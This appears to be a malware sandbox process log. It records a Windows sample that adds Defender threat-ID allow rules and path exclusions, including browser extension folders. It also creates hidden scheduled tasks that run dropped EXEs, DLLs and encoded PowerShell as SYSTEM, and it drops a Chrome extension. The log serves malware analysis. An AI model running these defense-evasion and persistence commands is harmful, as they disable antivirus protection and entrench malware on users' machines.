C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3724
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5084
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PQLMSqiBAQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PQLMSqiBAQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSkHgAnxcejbKBcgPeR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSkHgAnxcejbKBcgPeR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QeSinyHVynhjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QeSinyHVynhjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vCIAnFcQAxoU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vCIAnFcQAxoU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wtZEsiVEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wtZEsiVEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mfqEdiVtmGkcTjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mfqEdiVtmGkcTjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BTlodwNIywtfsdomJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BTlodwNIywtfsdomJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\NAmxXaxzgfEyPHjA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\NAmxXaxzgfEyPHjA\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PQLMSqiBAQUn" /t REG_DWORD /d 0 /reg:323⤵PID:1260
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PQLMSqiBAQUn" /t REG_DWORD /d 0 /reg:324⤵PID:3328
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PQLMSqiBAQUn" /t REG_DWORD /d 0 /reg:643⤵PID:3836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSkHgAnxcejbKBcgPeR" /t REG_DWORD /d 0 /reg:323⤵PID:2632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSkHgAnxcejbKBcgPeR" /t REG_DWORD /d 0 /reg:643⤵PID:3612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QeSinyHVynhjC" /t REG_DWORD /d 0 /reg:323⤵PID:564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QeSinyHVynhjC" /t REG_DWORD /d 0 /reg:643⤵PID:2172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCIAnFcQAxoU2" /t REG_DWORD /d 0 /reg:323⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCIAnFcQAxoU2" /t REG_DWORD /d 0 /reg:643⤵PID:880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wtZEsiVEU" /t REG_DWORD /d 0 /reg:323⤵PID:3252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wtZEsiVEU" /t REG_DWORD /d 0 /reg:643⤵PID:3820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mfqEdiVtmGkcTjVB /t REG_DWORD /d 0 /reg:323⤵PID:3048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mfqEdiVtmGkcTjVB /t REG_DWORD /d 0 /reg:643⤵PID:4276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BTlodwNIywtfsdomJ /t REG_DWORD /d 0 /reg:323⤵PID:4472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BTlodwNIywtfsdomJ /t REG_DWORD /d 0 /reg:643⤵PID:560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\NAmxXaxzgfEyPHjA /t REG_DWORD /d 0 /reg:323⤵PID:4768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\NAmxXaxzgfEyPHjA /t REG_DWORD /d 0 /reg:643⤵PID:1424
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHGUPpwkC" /SC once /ST 01:21:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHGUPpwkC"2⤵PID:4452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHGUPpwkC"2⤵PID:3240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ldxAgwOhkvPNhbwAM" /SC once /ST 01:49:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\NAmxXaxzgfEyPHjA\XNDqAwfEyOUKxMl\nokwLIc.exe\" sy /UJsite_idELh 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ldxAgwOhkvPNhbwAM"2⤵PID:916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5016
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1632
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4488
-
C:\Windows\Temp\NAmxXaxzgfEyPHjA\XNDqAwfEyOUKxMl\nokwLIc.exeC:\Windows\Temp\NAmxXaxzgfEyPHjA\XNDqAwfEyOUKxMl\nokwLIc.exe sy /UJsite_idELh 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4732 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bBnYWwjnJGGpcSkUWT"2⤵PID:4704
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:396
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4428
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wtZEsiVEU\ixocmj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rCGVCGVOEIeoNLR" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rCGVCGVOEIeoNLR2" /F /xml "C:\Program Files (x86)\wtZEsiVEU\jEBEUJa.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rCGVCGVOEIeoNLR"2⤵PID:1260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rCGVCGVOEIeoNLR"2⤵PID:4988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AyTJUWaAvyPQQh" /F /xml "C:\Program Files (x86)\vCIAnFcQAxoU2\pVSiYWg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "THnPugyWwQwgf2" /F /xml "C:\ProgramData\mfqEdiVtmGkcTjVB\mYOHppX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "emflysCnGhqIcVZEa2" /F /xml "C:\Program Files (x86)\QSkHgAnxcejbKBcgPeR\szEALtR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EAWzVclEVCENgiDufYU2" /F /xml "C:\Program Files (x86)\QeSinyHVynhjC\GFkAQxy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vIlXVaftrwFhqzMdS" /SC once /ST 09:09:30 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\NAmxXaxzgfEyPHjA\XTzKSsGd\oOyMGPr.dll\",#1 /acsite_idzNK 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vIlXVaftrwFhqzMdS"2⤵PID:4812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ldxAgwOhkvPNhbwAM"2⤵PID:2164
